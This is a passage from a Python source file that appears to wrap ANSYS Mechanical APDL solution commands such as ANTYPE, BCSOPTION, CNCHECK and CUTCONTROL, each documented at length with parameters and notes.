and deletes all .Rnnn files, or .Mnnn files for mode-
superposition transient analyses, beyond the point of
ENDSTEP. The .Rnnn or .Mnnn file at the point of ENDSTEP
are rewritten to record the rescaled load level.
RSTCREATE - At restart, retrieve information to be written to the results file for the
specified load step (LDSTEP) and substep (SUBSTEP). Be
sure to use OUTRES to write the results to the
results file. This action does not affect the .LDHI or
.Rnnn files. Previous items stored in the results file
at and beyond the point of RSTCREATE are deleted. This
option cannot be used to restart a mode-superposition
transient analysis.
PERTURB - At restart, a linear perturbation analysis (static, modal, buckling, or full
harmonic) is performed for the specified load step
(LDSTEP) and substep (SUBSTEP). This action does not
affect the .LDHI, .Rnnn, or .RST files.
Notes
-----
If using the ANTYPE command to change the analysis type in the same
SOLVE session, the program issues the following message: "Some analysis
options have been reset to their defaults. Please verify current
settings or respecify as required." Typically, the program resets
commands such as NLGEOM and EQSLV to their default values.
The analysis type (Antype) cannot be changed if a restart is specified.
Always save parameters before doing a restart. For more information on
the different types of restart, see Restarting an Analysis in the Basic
Analysis Guide.
This command is also valid in PREP7.
The ANSYS Professional - Nonlinear Structural (PRN) product supports
the Antype = TRANS option for mode-superposition (TRNOPT,MSUP) analyses
only.
"""
command = f"ANTYPE,{antype},{status},{ldstep},{substep},{action}"
return self.run(command, **kwargs)
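# Hedged usage sketch (assumes an active MAPDL session `mapdl`):
#   mapdl.run("/SOLU")
#   mapdl.antype("STATIC", "NEW")                        # start a new static analysis
#   mapdl.antype("STATIC", "RESTART", 2, 5, "CONTINUE")  # multiframe restart at load step 2, substep 5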
def ascres(self, opt="", **kwargs):
"""Specifies the output type for an acoustic scattering analysis.
APDL Command: ASCRES
Parameters
----------
opt
Output option:
TOTAL - Output the total pressure field (default).
SCAT - Output the scattered pressure field.
Notes
-----
Use the ASCRES command to specify the output type for an acoustic
scattering analysis.
The scattered option (Opt = SCAT) provides a scattered pressure output,
psc, required for calculating target strength (TS).
The default behavior (Opt = TOTAL) provides a sum of the incident and
scattering fields, ptotal = pinc + psc.
Issue the AWAVE command to define the incident pressure pinc. If the
AWAVE command is defined with Opt2 = INT, only the total pressure field
is output regardless of the ASCRES,Opt command.
"""
command = f"ASCRES,{opt}"
return self.run(command, **kwargs)
def asol(self, lab="", opt="", **kwargs):
"""Specifies the output type of an acoustic scattering analysis.
APDL Command: ASOL
Parameters
----------
lab
Acoustic solver specification (no default):
SCAT - Set acoustic solver to the scattered field formulation.
opt
Option identifying an acoustic solver status:
OFF - Deactivate the specified acoustic solver (default).
ON - Activate the specified acoustic solver.
Notes
-----
Use the ASOL command to activate the specified acoustic solution
process.
The scattered option (Lab = SCAT) sets the acoustic solver to the
scattered-pressure field formulation.
Issue the AWAVE command to define the incident pressure pinc. If the
AWAVE command is defined with Opt2 = INT, the acoustic solver is set to
the scattered field formulation regardless of the ASOL command issued.
"""
command = f"ASOL,{lab},{opt}"
return self.run(command, **kwargs)
def bcsoption(self, memory_option="", memory_size="", solve_info="", **kwargs):
"""Sets memory option for the sparse solver.
APDL Command: BCSOPTION
Parameters
----------
memory_option
Memory allocation option:
DEFAULT - Use the default memory allocation strategy for
the sparse solver. The default strategy attempts
to run in the INCORE memory mode. If there is
not enough available physical memory when the
solver starts to run in the INCORE memory mode,
the solver will then attempt to run in the
OUTOFCORE memory mode.
INCORE - Use a memory allocation strategy in the sparse
solver that will attempt to obtain enough memory
to run with the entire factorized matrix in
memory. This option uses the most amount of
memory and should avoid doing any I/O. By
avoiding I/O, this option achieves optimal solver
performance. However, a significant amount of
memory is required to run in this mode, and it is
only recommended on machines with a large amount
of memory. If the allocation for in-core memory
fails, the solver will automatically revert to
out-of-core memory mode.
OUTOFCORE - Use a memory allocation strategy in the sparse
solver that will attempt to allocate only
enough work space to factor each individual
frontal matrix in memory, but will store the
entire factorized matrix on disk. Typically,
this memory mode results in poor performance
due to the potential bottleneck caused by the
I/O to the various files written by the
solver.
FORCE - This option, when used in conjunction with the
Memory_Size option, allows you to force the sparse
solver to run with a specific amount of
memory. This option is only recommended for the
advanced user who understands sparse solver memory
requirements for the problem being solved,
understands the physical memory on the system, and
wants to control the sparse solver memory usage.
memory_size
Initial memory size allocation for the sparse solver in
MB. This argument allows you to tune the sparse solver
memory and is not generally required. Although there is no
upper limit for Memory_Size, the Memory_Size setting
should always be well within the physical memory
available, but not so small as to cause the sparse solver
to run out of memory. Warnings and/or errors from the
sparse solver will appear if this value is set too low. If
the FORCE memory option is used, this value is the amount
of memory allocated for the entire duration of the sparse
solver solution.
solve_info
Solver output option:
OFF - Turns off additional output printing from the sparse
solver (default).
PERFORMANCE - Turns on additional output printing from the
sparse solver, including a performance
summary and a summary of file I/O for the
sparse solver. Information on memory usage
during assembly of the global matrix (that
is, creation of the Jobname.FULL file) is
also printed with this option.
Notes
-----
This command controls options related to the sparse solver in
all analysis types where the sparse solver can be used. It
also controls the Block Lanczos eigensolver in a modal or
buckling analysis.
The sparse solver runs from one large work space (that is, one
large memory allocation). The amount of memory required for
the sparse solver is unknown until the matrix structure is
preprocessed, including equation reordering. The amount of
memory allocated for the sparse solver is then dynamically
adjusted to supply the solver what it needs to compute the
solution.
If you have a very large memory system, you may want to try
selecting the INCORE memory mode for larger jobs to improve
performance. When running the sparse solver on a machine with
very slow I/O performance (for example, slow hard drive
speed), you may want to try using the INCORE memory mode to
achieve better performance. However, doing so may require much
more memory compared to running in the OUTOFCORE memory mode.
Running with the INCORE memory mode is best for jobs which
comfortably fit within the limits of the physical memory on a
given system. If the sparse solver work space exceeds physical
memory size, the system will be forced to use virtual memory
(or the system page/swap file). In this case, it is typically
more efficient to run with the OUTOFCORE memory mode. Assuming
the job fits comfortably within the limits of the machine,
running with the INCORE memory mode is often ideal for jobs
where repeated solves are performed for a single matrix
factorization. This occurs in a modal or buckling analysis or
when doing multiple load steps in a linear, static analysis.
For repeated runs with the sparse solver, you may set the
initial sparse solver memory allocation to the amount required
for factorization. This strategy reduces the frequency of
allocation and reallocation in the run to make the INCORE
option fully effective. If you have a very large memory
system, you may use the Memory_Size argument to increase the
maximum size attempted for in-core runs.
"""
command = f"BCSOPTION,,{memory_option},{memory_size},,,{solve_info}"
return self.run(command, **kwargs)
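# Hedged usage sketch (assumes an active MAPDL session `mapdl`; the 8000 MB
# work space is an illustrative value only):
#   mapdl.bcsoption("INCORE")                       # try to factor fully in memory
#   mapdl.bcsoption("FORCE", 8000, "PERFORMANCE")   # fixed work space plus solver statistics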
def cgrow(self, action="", par1="", par2="", **kwargs):
"""Defines crack-growth information
APDL Command: CGROW
Parameters
----------
action
Specifies the action for defining or manipulating crack-growth
data:
NEW - Initiate a new set of crack-growth simulation data (default).
CID - Specify the crack-calculation (CINT) ID for energy-release rates to be used in
the fracture criterion calculation.
FCOPTION - Specify the fracture criterion for crack-growth/delamination.
CPATH - Specify the element component for crack growth.
DTIME - Specify the initial time step for crack growth.
DTMIN - Specify the minimum time step for crack growth.
DTMAX - Specify the maximum time step for crack growth.
FCRAT - Fracture criterion ratio (fc).
STOP - Stops the analysis when the specified maximum crack extension is reached.
METHOD - Define the method of crack propagation.
Notes
-----
When Action = NEW, the CGROW command initializes a crack-growth
simulation set. Subsequent CGROW commands define the parameters
necessary for the simulation.
For multiple cracks, issue multiple CGROW,NEW commands (and any
subsequent CGROW commands necessary to define the parameters) for each
crack.
If the analysis is restarted (ANTYPE,,RESTART), the CGROW command must
be re-issued.
For additional details on this command, see
https://www.mm.bme.hu/~gyebro/files/ans_help_v182/ans_cmd/Hlp_C_CGROW.html
"""
command = f"CGROW,{action},{par1},{par2}"
return self.run(command, **kwargs)
def cmatrix(
self, symfac="", condname="", numcond="", grndkey="", capname="", **kwargs
):
"""Performs electrostatic field solutions and calculates the
self and mutual capacitances between multiple conductors.x
APDL Command: CMATRIX
Parameters
----------
symfac
Geometric symmetry factor. Capacitance values are scaled by this
factor which represents the fraction of the total device modeled.
Defaults to 1.
condname
Alphanumeric prefix identifier used in defining named conductor
components.
numcond
Total Number of Components. If a ground is modeled, it is to be
included as a component. If a ground is not modeled, but infinite
elements are used to model the far-field ground, a named component
for the far-field ground is not required.
grndkey
Ground key:
0 - Ground is one of the components, which is not at infinity.
1 - Ground is at infinity (modeled by infinite elements).
capname
Array name for computed capacitance matrix. Defaults to CMATRIX.
Notes
-----
To invoke the CMATRIX macro, the exterior nodes of each conductor must
be grouped into individual components using the CM command. Each set
of independent components is assigned a component name with a common
prefix followed by the conductor number. A conductor system with a
ground must also include the ground nodes as a component. The ground
component is numbered last in the component name sequence.
A ground capacitance matrix relates charge to a voltage vector. A
ground matrix cannot be applied to a circuit modeler. The lumped
capacitance matrix is a combination of lumped "arrangements" of
voltage differences between conductors. Use the lumped capacitance
terms in a circuit modeler to represent capacitances between
conductors.
Enclose all name-strings in single quotes in the CMATRIX command line.
See the Mechanical APDL Theory Reference and HMAGSOLV in the Low-
Frequency Electromagnetic Analysis Guide for details.
This command does not support multiframe restarts.
"""
command = f"CMATRIX,{symfac},'{condname}',{numcond},{grndkey},'{capname}'"
return self.run(command, **kwargs)
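# Hedged usage sketch (assumes an active MAPDL session `mapdl` with conductor
# node components cond1..cond3 already defined via CM; values are illustrative):
#   mapdl.cmatrix(symfac=1, condname="cond", numcond=3, grndkey=0, capname="capmat")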
def cmsopt(
self,
cmsmeth="",
nmode="",
freqb="",
freqe="",
fbddef="",
fbdval="",
iokey="",
**kwargs,
):
"""Specifies component mode synthesis (CMS) analysis options.
APDL Command: CMSOPT
Parameters
----------
cmsmeth
The component mode synthesis method to use. This value is required.
FIX - Fixed-interface method.
FREE - Free-interface method.
RFFB - Residual-flexible free-interface method.
nmode
The number of normal modes extracted and used in the superelement
generation. This value is required; the minimum is 1.
freqb
Beginning, or lower end, of frequency range of interest. This value
is optional.
freqe
Ending, or upper end, of frequency range of interest. This value is
optional.
fbddef
In a free-interface (CMSMETH = FREE) or residual-flexible free-
interface (CMSMETH = RFFB) CMS analysis, the method to use for
defining free body modes:
FNUM - The number (FBDVAL) of rigid body modes in the calculation.
FTOL - Employ a specified tolerance (FBDVAL) to determine rigid body modes in the
calculation.
FAUTO - Automatically determine rigid body modes in the calculation. This method is the
default.
RIGID - If no rigid body modes exist, define your own via the RIGID command.
fbdval
In a free-interface CMS analysis (CMSMETH = FREE), the number of
rigid body modes if FBDDEF = fnum (where the value is an integer
from 0 through 6), or the tolerance to employ if FBDDEF = ftol
(where the value is a positive real number representing rad/sec).
This value is required only when FBDDEF = fnum or FBDDEF = ftol;
otherwise, any specified value is ignored.
iokey
Output key to control writing of the transformation matrix to the
.TCMS file (FIX or FREE methods) or body properties to the .EXB
file (FIX method).
TCMS - Write the transformation matrix of the nodal component defined by the OUTPR
command to a .TCMS file. Refer to TCMS File Format in the
Programmer's Reference for more information on this file.
EXB - Write a body property input file (.EXB file) containing the condensed
substructure matrices and other body properties for use with
AVL EXCITE. Refer to ANSYS Interface to AVL EXCITE in the
Substructuring Analysis Guide for more information.
Notes
-----
CMS employs the Block Lanczos eigensolution method in the generation
pass.
CMS supports damping matrix reduction when a damping matrix exists. Set
the matrix generation key to 3 (SEOPT,Sename,SEMATR) to generate and
then reduce stiffness, mass, and damping matrices.
CMS does not support the SEOPT,,,,,RESOLVE command. Instead, ANSYS sets
the expansion method for the expansion pass (EXPMTH) to BACKSUB.
For more information about performing a CMS analysis, see Component
Mode Synthesis in the Substructuring Analysis Guide.
If IOKEY = TCMS is used to output the transformation matrix, then only
ITEM = NSOL is valid in the OUTPR command. In the interactive
sessions, the transformation matrix will not be output if the model has
more than 10 elements.
This command is also valid in /PREP7.
"""
command = f"CMSOPT,{cmsmeth},{nmode},{freqb},{freqe},{fbddef},{fbdval},{iokey}"
return self.run(command, **kwargs)
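# Hedged usage sketch (assumes an active MAPDL session `mapdl` in a CMS
# generation pass; the mode count is illustrative):
#   mapdl.run("/SOLU")
#   mapdl.antype("SUBSTR")     # substructure generation pass
#   mapdl.cmsopt("FIX", 20)    # fixed-interface CMS with 20 normal modes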
def cncheck(
self,
option="",
rid1="",
rid2="",
rinc="",
intertype="",
trlevel="",
cgap="",
cpen="",
ioff="",
**kwargs,
):
"""Provides and/or adjusts the initial status of contact pairs.
APDL Command: CNCHECK
Parameters
----------
option
Option to be performed:
* ``"DETAIL"`` : List all contact pair properties (default).
* ``"SUMMARY"`` : List only the open/closed status for each
contact pair.
* ``"POST"`` : Execute a partial solution to write the initial
contact configuration to the Jobname.RCN file.
* ``"ADJUST"`` : Physically move contact nodes to the target
in order to close a gap or reduce penetration. The initial
adjustment is converted to structural displacement values
(UX, UY, UZ) and stored in the Jobname.RCN file.
* ``"MORPH"`` : Physically move contact nodes to the target in
order to close a gap or reduce penetration, and also morph
the underlying solid mesh. The initial adjustment of contact
nodes and repositioning of solid element nodes due to mesh
morphing are converted to structural displacement values
(UX, UY, UZ) and stored in the Jobname.RCN file.
* ``"RESET"`` : Reset target element and contact element key
options and real constants to their default values. This
option is not valid for general contact.
* ``"AUTO"`` : Automatically sets certain real constants and
key options to recommended values or settings in order to
achieve better convergence based on overall contact pair
behaviors. This option is not valid for general contact.
* ``"TRIM"`` : Trim contact pair (remove certain contact and
target elements).
* ``"UNSE"`` : Unselect certain contact and target elements.
rid1, rid2, rinc
For pair-based contact, the range of real constant pair IDs
for which Option will be performed. If RID2 is not specified,
it defaults to RID1. If no value is specified, all contact
pairs in the selected set of elements are considered.
For general contact (InterType = GCN), RID1 and RID2 are
section IDs associated with general contact surfaces instead
of real constant IDs. If RINC = 0, the Option is performed
between the two sections, RID1 and RID2. If RINC > 0, the
Option is performed among all specified sections (RID1 to RID2
with increment of RINC).
intertype
The type of contact interface (pair-based versus general
contact) to be considered; or the type of contact pair to be
trimmed/unselected/auto-set.
The following labels specify the type of contact interface:
* ``""`` : (blank) Include all contact definitions (pair-based
and general contact).
* ``"GCN"`` : Include general contact definitions only (not valid when Option = RESET or AUTO).
The following labels specify the type of contact pairs to be
trimmed/unselected/auto-set (used only when Option = TRIM,
UNSE, or AUTO, and only for pair-based contact definitions):
* ``"ANY"`` : All types (default).
* ``"MPC"`` : MPC-based contact pairs (KEYOPT(2) = 2).
* ``"BOND"`` : Bonded contact pairs (KEYOPT(12) = 3, 5, 6).
* ``"NOSP"`` : No separation contact pairs (KEYOPT(12) = 2, 4).
* ``"INAC"`` : Inactive contact pairs (symmetric contact pairs for MPC contact or KEYOPT(8) = 2).
* ``"TRlevel"`` : mming level (used only when Option = TRIM, UNSE, or MORPH):
* ``"(blank)"`` : Normal trimming (default): remove/unselect contact and target elements which are in far-field.
* ``"AGGRE"`` : Aggressive trimming: remove/unselect contact and target elements which are in far-field, and certain elements in near-field.
cgap
They are only valid when Option = ADJUST or MORPH. Control
parameter for opening gap. Close the opening gap if the
absolute value of the gap is smaller than the CGAP value. CGAP
defaults to ``0.25*PINB`` (where PINB is the pinball radius) for
bonded and no-separation contact; otherwise it defaults to the
value of real constant ICONT.
cpen
They are only valid when Option = ADJUST or MORPH. Control
parameter for initial penetration. Close the initial
penetration if the absolute value of the penetration is
smaller than the CPEN value. CPEN defaults to ``0.25*PINB`` (where
PINB is the pinball radius) for any type of interface behavior
(either bonded or standard contact).
ioff
They are only valid when Option = ADJUST or MORPH. Control
parameter for initial adjustment. Input a positive value to
adjust the contact nodes towards the target surface with a
constant interference distance equal to IOFF. Input a negative
value to adjust the contact node towards the target surface
with a uniform gap distance equal to the absolute value of
IOFF.
Notes
-----
The CNCHECK command provides information for surface-to-surface,
node-to-surface, and line-to-line contact pairs (element types
TARGE169, TARGE170, CONTA171, CONTA172, CONTA173, CONTA174,
CONTA175, CONTA176, CONTA177). All contact and target elements of
interest, along with the solid elements and nodes attached to
them, must be selected for the command to function properly. For
performance reasons, the program uses a subset of nodes and
elements based on the specified contact regions (RID1, RID2, RINC)
when executing the CNCHECK command.
For additional details, see the notes section at:
https://www.mm.bme.hu/~gyebro/files/ans_help_v182/ans_cmd/Hlp_C_CNCHECK.html
"""
command = f"CNCHECK,{option},{rid1},{rid2},{rinc},{intertype},{trlevel},{cgap},{cpen},{ioff}"
return self.run(command, **kwargs)
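# Hedged usage sketch (assumes an active MAPDL session `mapdl` with contact
# pairs already defined; the real constant ID range is illustrative):
#   mapdl.cncheck("SUMMARY")            # open/closed status of every pair
#   mapdl.cncheck("ADJUST", 3, 5, 1)    # close small gaps for pair IDs 3 through 5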
def cnkmod(self, itype="", knum="", value="", **kwargs):
"""Modifies contact element key options.
APDL Command: CNKMOD
Parameters
----------
itype
Contact element type number as defined on the ET command.
knum
Number of the KEYOPT to be modified (KEYOPT(KNUM)).
value
Value to be assigned to the KEYOPT.
Notes
-----
The CNKMOD command has the same syntax as the KEYOPT command. However,
it is valid only in the SOLUTION processor. This command is intended
only for use in a linear perturbation analysis, and can only be used to
modify certain contact element KEYOPT values as described below.
Modifying KEYOPT(12)
One use for this command is to modify contact interface behavior
between load steps in a linear perturbation analysis; it allows the
user to control the contact status locally per contact pair. For this
application, this command is limited to changing the contact interface
behavior key option: KEYOPT(12) of CONTA171, CONTA172, CONTA173,
CONTA174, CONTA175, CONTA176, and CONTA177; and KEYOPT(10) of CONTA178.
When used for this purpose, the command adjusts the contact status from
the linear perturbation base analysis (at the point of restart) as
described in the table below. Note that CNKMOD allows you to take
points in the base analysis that are near contact (within the pinball
region) and modify them to be treated as "in contact" in the
perturbation analysis; see the "1 - near-field" row with KEYOPT(12)
values set to 4 or 5. CNKMOD also allows you to take points that are
sliding in the base analysis and treat them as sticking in the
perturbation analysis, irrespective of the MU value; see the "2 -
sliding" row with KEYOPT(12) values set to 1,3, 5, or 6.
Table 128: Adjusted Contact Status when CNKMOD is Issued. [Table omitted here;
the adjusted status depends on whether the point lies inside or outside of the
adjusted pinball region. See the ANSYS documentation for the full table.]
If an open gap exists at the end of the previous load step and the
contact status is adjusted as sliding or sticking due to a "bonded" or
"no separation" contact behavior definition, then the program will
treat it as near-field contact when executing CNKMOD in the subsequent
load steps.
In the linear perturbation analysis procedure, contact status can also
be controlled or modified by the PERTURB command. The contact status
always follows local controls defined by the CNKMOD command first, and
is then adjusted by the global sticking or bonded setting (ContKey =
STICKING or BONDED) on the PERTURB command (see the PERTURB command for
details).
Modifying KEYOPT(3)
Another use for this command is to change the units of normal contact
stiffness (contact element real constant FKN) in a linear perturbation
modal analysis that is used to model brake squeal. For contact elements
CONTA171, CONTA172, CONTA173, and CONTA174, KEYOPT(3) controls the
units of normal contact stiffness. You can issue the command
CNKMOD,ITYPE,3,1 during the first phase of the linear perturbation
analysis in order to change the units of normal contact stiffness from
FORCE/LENGTH3 (in the base analysis) to FORCE/LENGTH. Note that
KEYOPT(3) = 1 is valid only when a penalty-based algorithm is used
(KEYOPT(2) = 0 or 1) and the absolute normal contact stiffness value is
explicitly specified (that is, a negative value input for real constant
FKN).
"""
command = f"CNKMOD,{itype},{knum},{value}"
return self.run(command, **kwargs)
def cntr(self, option="", key="", **kwargs):
"""Redirects contact pair output quantities to a text file.
APDL Command: CNTR
Parameters
----------
option
Output option:
OUT - Contact output control.
key
Control key:
NO - Write contact information to the output file or to the screen (default).
YES - Write contact information to the Jobname.CNM file.
Notes
-----
Issue the command CNTR,OUT,YES to redirect contact pair output
quantities to the Jobname.CNM file.
To ensure that the contact information is written to Jobname.CNM,
reissue CNTR,OUT,YES each time you reenter the solution processor
(/SOLU).
"""
command = f"CNTR,{option},{key}"
return self.run(command, **kwargs)
def cutcontrol(self, lab="", value="", option="", **kwargs):
"""Controls time-step cutback during a nonlinear solution.
APDL Command: CUTCONTROL
Parameters
----------
lab
Specifies the criteria for causing a cutback. Valid labels are:
PLSLIMIT - Maximum equivalent plastic strain allowed within a time-step (substep). If the
calculated value exceeds the VALUE, the program
performs a cutback (bisection). VALUE defaults to 0.15
(15%).
CRPLIMIT - Set values for calculating the maximum equivalent creep ratio allowed within a
time step. If the calculated maximum creep ratio
exceeds the defined creep ratio limit, the program
performs a cutback.
DSPLIMIT - Maximum incremental displacement within the solution field in a time step
(substep). If the maximum calculated value exceeds
VALUE, the program performs a cutback (bisection).
VALUE defaults to 1.0 x 107.
NPOINT - Number of points in a cycle for a second order dynamic equation, used to
control automatic time stepping. If the number of
solution points per cycle is less than VALUE, the program
performs a cutback in time step size. VALUE defaults to
13 for linear analysis, 5 for nonlinear analysis. A
larger number of points yields a more accurate solution
but also increases the solution run time.
This option works well for linear problems. For nonlinear analyses, other factors such as contact status changes and solution convergence rate can overwrite NPOINT. See Automatic Time Stepping in the Mechanical APDL Theory Reference for more information on automatic time stepping.
NOITERPREDICT - If VALUE is 0 (default), an internal auto time step scheme will predict the number of iterations for nonlinear convergence and perform a cutback earlier than the number of iterations specified by the NEQIT command. This is the recommended option. If VALUE is 1, the solution will iterate (if nonconvergent) to NEQIT number of iterations before a cutback is invoked. It is sometimes useful for poorly-convergent problems, but rarely needed in general.
Bisection is also controlled by contact status change, plasticity or creep
strain limit, and other factors. If any of these
factors occur, bisection will still take place,
regardless of the NOITERPREDICT setting.
CUTBACKFACTOR - Changes the cutback value for bisection. Default is 0.5. VALUE must be greater
than 0.0 and less than 1.0. This option is active
only if AUTOTS,ON is set.
value
Numeric value for the specified cutback criterion. For Lab =
CRPLIMIT, VALUE is the creep criteria for the creep ratio limit.
option
Type of creep analysis. Valid for Lab = CRPLIMIT only.
IMPRATIO - Set the maximum creep ratio value for implicit creep. The default is 0.0 (i.e.,
no creep limit control) and any positive value is
valid. (See Implicit Creep Procedure in the Structural
Analysis Guide for information on how to define
implicit creep.)
EXPRATIO - Set the maximum creep ratio value for explicit creep. The default value is 0.1
and any positive value up to 0.25 is allowed. (See
Explicit Creep Procedure in the Structural Analysis
Guide for information on how to define explicit
creep.)
STSLIMIT - Stress threshold for calculating the creep ratio. For integration points with
effective stress below this threshold, the creep ratio
does not cause cutback. The default value is 0.0 and
any positive value is valid.
STNLIMIT - Elastic strain threshold for calculating the creep ratio. For integration
points with effective elastic strain below this
threshold, the creep ratio does not cause cutback. The
default value is 0.0 and any positive value is valid.
Notes
-----
A cutback is a method for automatically reducing the step size when
either the solution error is too large or the solution encounters
convergence difficulties during a nonlinear analysis.
Should a convergence failure occur, the program reduces the time step
interval to a fraction of its previous size and automatically continues
the solution from the last successfully converged time step. If the
reduced time step again fails to converge, the program again reduces
the time step size and proceeds with the solution. This process
continues until convergence is achieved or the minimum specified time
step value is reached.
For creep analysis, the cutback procedure is similar; the process
continues until the minimum specified time step size is reached.
However, if the creep ratio limit is exceeded, the program issues a
warning but continues the substep until the analysis is complete. In
this case, convergence is achieved but the creep ratio criteria is not
satisfied.
The CRPLIM command is functionally equivalent to Lab = CRPLIMIT with
options IMPRATIO and EXPRATIO
"""
command = f"CUTCONTROL,{lab},{value},{option}"
return self.run(command, **kwargs)
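# Hedged usage sketch (assumes an active MAPDL session `mapdl`; the limits are
# illustrative values only):
#   mapdl.cutcontrol("PLSLIMIT", 0.10)                # bisect above 10% equivalent plastic strain
#   mapdl.cutcontrol("CRPLIMIT", 0.15, "IMPRATIO")    # implicit creep ratio limit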
def ddoption(self, decomp="", **kwargs):
"""Sets domain decomposer option for Distributed ANSYS.
APDL Command: DDOPTION
Parameters
----------
decomp
Controls which domain decomposition algorithm to use.
AUTO - Use the default domain decomposition algorithm when splitting the model into
domains for Distributed ANSYS (default).
GREEDY - Use the "greedy" domain decomposition algorithm.
METIS - Use the METIS graph partitioning domain decomposition algorithm.
Notes
-----
This command controls options relating to the domain decomposition
algorithm used by Distributed ANSYS to split the model into pieces (or
domains), with each piece being solved on a different processor.
The greedy domain decomposition algorithm starts from a single element
at a corner of the model. The domain grows by taking the properly
connected neighboring elements and stops after reaching the optimal
size.
The METIS domain decomposition algorithm starts by creating a graph
from the finite element mesh. It then uses a multilevel graph
partitioning scheme which reduces the size of the original graph,
creates domains using the reduced graph, and then creates the final CPU
domains by expanding the smaller domains from the reduced graph back to
the original mesh.
"""
command = f"DDOPTION,{decomp}"
return self.run(command, **kwargs)
def dmpext(
self, smode="", tmode="", dmpname="", freqb="", freqe="", nsteps="", **kwargs
):
"""Extracts modal damping coefficients in a specified frequency range.
APDL Command: DMPEXT
Parameters
----------
smode
Source mode number. There is no default for this field; you must
enter an integer greater than zero.
tmode
Target mode. Defaults to SMODE.
dmpname
Array parameter name containing the damping results. Defaults to
d_damp.
freqb
Beginning frequency range (real number greater than zero) or 'EIG'
at eigenfrequency of source mode. 'EIG' is valid only if SMODE =
TMODE. Note that EIG must be enclosed in single quotes when this
command is used on the command line or in an input file. There is
no default for this field; you must enter a value.
freqe
End of frequency range. Must be blank for Freqb = EIG. Default is
Freqb.
nsteps
Number of substeps. Defaults to 1.
Notes
-----
DMPEXT invokes an ANSYS macro that uses modal projection techniques to
compute the damping force by the modal velocity of the source mode onto
the target mode. From the damping force, damping parameters are
extracted. DMPEXT creates an array parameter Dmpname, with the
following entries in each row:
response frequency
modal damping coefficient
modal squeeze stiffness coefficient
damping ratio
squeeze-to-structural stiffness ratio
The macro requires the modal displacements from the file Jobname.EFL
obtained from the RMFLVEC command. In addition, a node component FLUN
must exist from all FLUID136 nodes. The computed damping ratio may be
used to specify constant or modal damping by means of the DMPRAT or
MDAMP commands. For Rayleigh damping, use the ABEXTRACT command to
compute ALPHAD and BETAD damping parameters. See Thin Film Analysis for
more information on thin film analyses.
The macro uses the LSSOLVE command to perform two load steps for each
frequency. The first load case contains the solution of the source
mode excitation and can be used for further postprocessing. Solid model
boundary conditions are deleted from the model. In addition,
prescribed nodal boundary conditions are applied to the model. You
should carefully check the boundary conditions of your model prior to
executing a subsequent analysis.
This command is also valid in PREP7.
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
"""
command = f"DMPEXT,{smode},{tmode},{dmpname},{freqb},{freqe},{nsteps}"
return self.run(command, **kwargs)
def dmpoption(self, filetype="", combine="", **kwargs):
"""Specifies distributed memory parallel (Distributed ANSYS) file
APDL Command: DMPOPTION
combination options.
Parameters
----------
filetype
Type of solution file to combine after a distributed memory
parallel solution. There is no default; if (blank), the command is
ignored.
RST - Results files (.RST, .RTH, .RMG, .RSTP)
EMAT - Element matrix files (.EMAT).
ESAV - Element saved data files (.ESAVE)
MODE - Modal results files (.MODE)
MLV - Modal load vector file (.MLV)
IST - Initial state file (.IST)
FULL - Full matrix file (.FULL)
RFRQ - Reduced complex displacement file (.RFRQ)
RDSP - Reduced displacement file (.RDSP)
combine
Option to combine solution files.
Yes - Combine solution files (default).
No - Do not combine solution files.
Notes
-----
The DMPOPTION command controls how solution files are written during a
distributed memory parallel (Distributed ANSYS) solution. This command
is most useful for controlling how results files (.RST,.RTH, etc.) are
written.
In a distributed memory parallel solution, a local results file is
written by each process (JobnameN.ext, where N is the process number).
By default, the program automatically combines the local results files
(for example, JobnameN.RST) upon leaving the SOLUTION processor (for
example, upon the FINISH command) into a single global results file
(Jobname.RST) which can be used in ANSYS postprocessing. To reduce the
amount of communication and I/O performed by this operation, you can
issue the command DMPOPTION,RST,NO to bypass this step of combining the
local results files; the local files will remain on the local disks in
the current working directory. You can then use the RESCOMBINE command
macro in the POST1 general postprocessor (/POST1) to read all results
into the database for postprocessing.
The RESCOMBINE command macro is intended for use with POST1. If you
want to postprocess distributed parallel solution results using the
POST26 time-history postprocessor (/POST26), it is recommended that you
combine your local results files into one global results file
(DMPOPTION,RST,YES or COMBINE).
Local .EMAT, .ESAV, .MODE, .MLV, .IST, .RFRQ, .RDSP, and .FULL files
are also written (when applicable) by each process in a distributed
memory parallel solution. If these files are not needed for a
downstream solution or operation, you can issue the command
DMPOPTION,FileType,NO for each file type to bypass the file combination
step and thereby improve performance. You should not bypass the file
combination step if a downstream PSD analysis or modal expansion pass
will be performed.
If DMPOPTION,MODE,NO or DMPOPTION,RST,NO is specified in a modal
analysis, element results cannot be written to the combined mode file
(Jobname.MODE). In this case, if Distributed ANSYS is used in a
downstream harmonic or transient analysis that uses the mode-
superposition method, the MSUPkey on the MXPAND command can retain its
value. However, if shared memory parallel processing is used in the
downstream harmonic or transient analysis, the MSUPkey is effectively
set to NO.
The DMPOPTION command can be changed between load steps; however, doing
so will not affect which set of solution files are combined. Only the
last values of FileType and Combine upon leaving the solution processor
will be used to determine whether the solution files are combined. For
example, given a two load step solution and FileType = RST, setting
Combine = NO for the first load step and YES for the second load step
will cause all sets on the local results files to be combined. If the
opposite is true (Combine = YES for the first load step and NO for the
second load step), no results will be combined.
After using DMPOPTION to suppress file combination, you may find it
necessary to combine the local files for a specific FileType for use in
a subsequent analysis. In this case, use the COMBINE command to combine
local solution files into a single, global file.
"""
command = f"DMPOPTION,{filetype},{combine}"
return self.run(command, **kwargs)
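# Hedged usage sketch (assumes a Distributed ANSYS run driven through an active
# MAPDL session `mapdl`):
#   mapdl.dmpoption("RST", "NO")    # leave local JobnameN.RST files uncombined
#   mapdl.dmpoption("EMAT", "NO")   # skip combining element matrix files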
def dspoption(
self, reord_option="", memory_option="", memory_size="", solve_info="", **kwargs
):
"""Sets memory option for the distributed sparse solver.
APDL Command: DSPOPTION
Parameters
----------
reord_option
Reordering option:
DEFAULT - Use the default reordering scheme.
SEQORDER - Use a sequential equation reordering scheme
within the distributed sparse solver. Relative
to PARORDER, this option typically results in
longer equation ordering times and therefore
longer overall solver times. Occasionally,
however, this option will produce better
quality orderings which decrease the matrix
factorization times and improve overall solver
performance.
PARORDER - Use a parallel equation reordering scheme
within the distributed sparse solver. Relative
to SEQORDER, this option typically results in
shorter equation ordering times and therefore
shorter overall solver times. Occasionally,
however, this option will produce lower quality
orderings which increase the matrix
factorization times and degrade overall solver
performance.
memory_option
Memory allocation option:
DEFAULT - Use the default memory allocation strategy for
the distributed sparse solver. The default
strategy attempts to run in the INCORE memory
mode. If there is not enough physical memory
available when the solver starts to run in the
INCORE memory mode, the solver will then attempt
